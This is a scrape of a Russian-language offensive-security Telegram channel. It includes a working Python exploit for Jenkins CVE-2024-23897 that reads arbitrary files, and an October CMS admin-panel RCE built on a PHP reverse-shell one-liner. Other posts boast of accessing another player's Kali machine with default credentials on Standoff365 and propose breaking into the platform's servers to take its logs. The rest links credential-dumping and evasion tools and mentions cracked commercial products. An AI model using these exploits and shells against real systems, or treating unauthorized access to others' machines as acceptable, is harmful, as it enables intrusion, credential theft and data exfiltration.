Forwarded from Похек (Sergey Zybnev)
Jenkins RCE CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
Использование:
🌚 @poxek
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👎2❤1
true_security
Где найти команду сбер страхования? нужно показать интересные вещи...
найден, всем спасибо
👍3
Аналог sharphound и других сборщиков для bloodhound (и не только), но собирает информацию по протоколу Active Directory Web Services (ADWS) через SOAP запросы.
Впринципе, детекты по LDAP запросам (NTA, SIEM правила и другие детекты аномалий) отвалились(да, но нет))).
https://github.com/FalconForceTeam/SOAPHound
P.S. на контроллерах домена должен быть открыт tcp порт 9389
Впринципе, детекты по LDAP запросам (NTA, SIEM правила и другие детекты аномалий) отвалились(да, но нет))).
https://github.com/FalconForceTeam/SOAPHound
P.S. на контроллерах домена должен быть открыт tcp порт 9389
GitHub
GitHub - FalconForceTeam/SOAPHound: SOAPHound is a custom-developed .NET data collector tool which can be used to enumerate Active…
SOAPHound is a custom-developed .NET data collector tool which can be used to enumerate Active Directory environments via the Active Directory Web Services (ADWS) protocol. - FalconForceTeam/SOAPHound
🔥3
Нолик от нолика (я cve не нашел и метод работает на стенде разработчика с последней версией - 3.5.0).
Уволился с работы, появилась неделя свободного времени.
Пошел ковырять стендофф365, смотрел сегодня таску с october cms. Попал в админку, посмотрел как ребята мучались с rce и нашел свой способ rce через админ панель.
В настройках отправки почты необходимо выбрать метод sendmail и в строку sendmail path дописать свой код для выполнения, например reverse shell:
после сохранения настроек необходимо вызвать отправку письма, например восстановлением пароля по логину и команда будет выполнена. Привет reverse shell.
Разумеется, только в образовательных целях.
Уволился с работы, появилась неделя свободного времени.
Пошел ковырять стендофф365, смотрел сегодня таску с october cms. Попал в админку, посмотрел как ребята мучались с rce и нашел свой способ rce через админ панель.
В настройках отправки почты необходимо выбрать метод sendmail и в строку sendmail path дописать свой код для выполнения, например reverse shell:
php -r '$sock=fsockopen("ip",port);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'; /usr/sbin/sendmail -t -iпосле сохранения настроек необходимо вызвать отправку письма, например восстановлением пароля по логину и команда будет выполнена. Привет reverse shell.
Разумеется, только в образовательных целях.
🔥16👍3
Интересное время, стали появляться крякнутые продукты позитива. pt nad, pt siem + vm. Это ли не признание продуктов?:)
👍11😁7
Не секрет что друзья не растут в огороде позитив собирает телеметрию на площадке standoff365. Если для "красных" ситуация более менее понятна, можно когда угодно приходить и тренить, за что собственно огромный респект pt. То с синими все печально, нет ни-че-го для развития скилов.
Что же делать простому работяге?)) Можно, например, прокачаться в социалку и инфру, получить доступ к серверам стендов... а потом завернуть логи к себе для дальнейшего сбора телеметрии.
PT собирает логи на лог коллекторы, что собственно не мешает нам забирать эти логи после получения доступа. Так же очень интересны, с точки зрения хантов, doc файлы которые отправляют при реализации атак методом соц. инженерии, логи веб-серверов и auditd с linuxов.
Вот так площадка standoff365 может быть полезна синим, и мозги размять при взломе и телеметрию собрать.
P.S. наврятли вы/мы/я найдем что то супер интересное в логах со standoff365, но для выработки насмотренности очень даже ничего.
Что же делать простому работяге?)) Можно, например, прокачаться в социалку и инфру, получить доступ к серверам стендов... а потом завернуть логи к себе для дальнейшего сбора телеметрии.
PT собирает логи на лог коллекторы, что собственно не мешает нам забирать эти логи после получения доступа. Так же очень интересны, с точки зрения хантов, doc файлы которые отправляют при реализации атак методом соц. инженерии, логи веб-серверов и auditd с linuxов.
Вот так площадка standoff365 может быть полезна синим, и мозги размять при взломе и телеметрию собрать.
P.S. наврятли вы/мы/я найдем что то супер интересное в логах со standoff365, но для выработки насмотренности очень даже ничего.
👍5
true_security
первый релиз описанного выше модуля (целиком со всем проектом impacket): https://github.com/feedb/impacket_ews Возможно. у кого то найдется время и желание потестировать и закинуть запрос на добавление/улучшение. запуск: ntlmrelayx.py -smb2support -t htt…
Накопительное обновление 14 (CU14) Exchange Server 2019 устраняет эту уязвимость, активируя защиту ретрансляции учетных данных NTLM (также известную как расширенная защита для проверки подлинности или EPA).
Прощайте релеи на exchange =/.
Еще и уязвимостью это обозвали. жили столько лет а тут не тебе.
Прощайте релеи на exchange =/.
Еще и уязвимостью это обозвали. жили столько лет а тут не тебе.
это еще и зиродей CVE-2024-21410 (CVSS: 9,8). 😂 что курят в майкрософт, этой теме 100 лет уже и разных тулз для эксплуатации было выпущено достаточно. Некоторые из этих тулз уже протухли и умерли.
по этим чертовым netntlmv2 можно брутить пароли пользователей, нужно срочно запретить пароли.
жду через 5 лет фиксов в утечках ntlm хэшей через html файлы, будет 000day🤨
ПС майки, там еще с сервером sharepoint беда)))
по этим чертовым netntlmv2 можно брутить пароли пользователей, нужно срочно запретить пароли.
жду через 5 лет фиксов в утечках ntlm хэшей через html файлы, будет 000day🤨
ПС майки, там еще с сервером sharepoint беда)))
👍4
Friendly fire на площадке stanfoff365.
Хакер, берегиочко доступы с молоду.
На площадке открыт сетевой доступ между клиентами vpn, многие используют дистрибутив kali с дефолт кредами, а кто то еще и ssh стартует. Результат на скрине, получен доступ к kali хакера из Казахстана с ником ivashka из команды TSARKA.
Конечно же, с любовью и заботой о коллегах.
Хакер, береги
На площадке открыт сетевой доступ между клиентами vpn, многие используют дистрибутив kali с дефолт кредами, а кто то еще и ssh стартует. Результат на скрине, получен доступ к kali хакера из Казахстана с ником ivashka из команды TSARKA.
Конечно же, с любовью и заботой о коллегах.
😁42👍2👎1
Написал немного заметок про zabbix и интересные возможности.
читать
читать
Telegraph
заметки про zabbix
Иногда на тестах есть доступ к заббиксу с ограниченными правами, я покажу некоторые интересные вещи на примере заббикса на standoff365. У нас есть доступ к заббиксу с ограниченными правами, доступен только один хост, как на скрине: В самом заббиксе на мониторинге…
🔥10👍1
Мой любимый работодатель запилил исследование по угрозам
https://bi.zone/expertise/research/threat-zone-2024/
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰5👍2❤1
Forwarded from RedTeam brazzers (Миша)
DC7499.pptx
5.2 MB
Способы получения учетных данных без взаимодействия с процессом lsass.exe
Продолжаю свой небольшой курс лекций, который я с радостью читаю в университете :) На этот раз решил подсветить и обратить внимание на варианты извлечения учётных данных без взаимодействия с процессом lsass.exe. Изначально презентация создавалась под субботнюю встречу DC7499, но записей оттуда пока что нет, поэтому я прочитал материал ещё раз, ведь тема действительно важная и может когда-нибудь спасти проект :)
С записью можно ознакомиться вот тут:
https://vk.com/video-210214143_456239063?list=07690309879b933b1b
Продолжаю свой небольшой курс лекций, который я с радостью читаю в университете :) На этот раз решил подсветить и обратить внимание на варианты извлечения учётных данных без взаимодействия с процессом lsass.exe. Изначально презентация создавалась под субботнюю встречу DC7499, но записей оттуда пока что нет, поэтому я прочитал материал ещё раз, ведь тема действительно важная и может когда-нибудь спасти проект :)
С записью можно ознакомиться вот тут:
https://vk.com/video-210214143_456239063?list=07690309879b933b1b
👍2
Tomer_Bar_&_Shmuel_Cohen_EDR_Reloaded_Erase_Data_Remotely.pdf
5 MB
это не база, это базище😂
https://github.com/fortra/impacket/pull/1719
дамп sam/system/security через shadowcopy
дамп sam/system/security через shadowcopy
GitHub
[SECRETSDUMP] New Dump Method - Shadow Snapshot Method via WMI by PeterGabaldon · Pull Request #1719 · fortra/impacket
[UPDATE]
Thanks to @Veids and its advice, it is now working without RCE. It was my mistake that I implemented it bad, but now it is working. SAM/SYSTEM/SECURITY are downloaded via SMB from the Shad...
Thanks to @Veids and its advice, it is now working without RCE. It was my mistake that I implemented it bad, but now it is working. SAM/SYSTEM/SECURITY are downloaded via SMB from the Shad...
🔥5
true_security
Иногда для lpe на винде при определённых условиях нужен перезапуск служб/ребут ос. Прав на это нет, но может помочь https://github.com/peewpw/Invoke-BSOD/blob/master/Invoke-BSOD.ps1 Бсодит винду без прав админа, не детектится антивирусами.
эту фичу можно использовать для получения кред из lsass в совокупности с описанными тут методами
P.S. сидел собирал собирал инфу а snovvcrash все уже давно описал =/
P.S. сидел собирал собирал инфу а snovvcrash все уже давно описал =/
🔥3😁2
Forwarded from Cracking | Reversing
VPN
Разбираем различные методы обнаружения IP-адресов VPN от таких провайдеров, как
https://ipapi.is/blog/systematic-vpn-detection.html
Большой список VPN exit NODE
Private: @CrackCloudRobot
Crypto Wares: @CryptoWares
Other projects: @MalwareLinks
Разбираем различные методы обнаружения IP-адресов VPN от таких провайдеров, как
NordVPN или ExpressVPN. https://ipapi.is/blog/systematic-vpn-detection.html
Большой список VPN exit NODE
Private: @CrackCloudRobot
Crypto Wares: @CryptoWares
Other projects: @MalwareLinks
👍9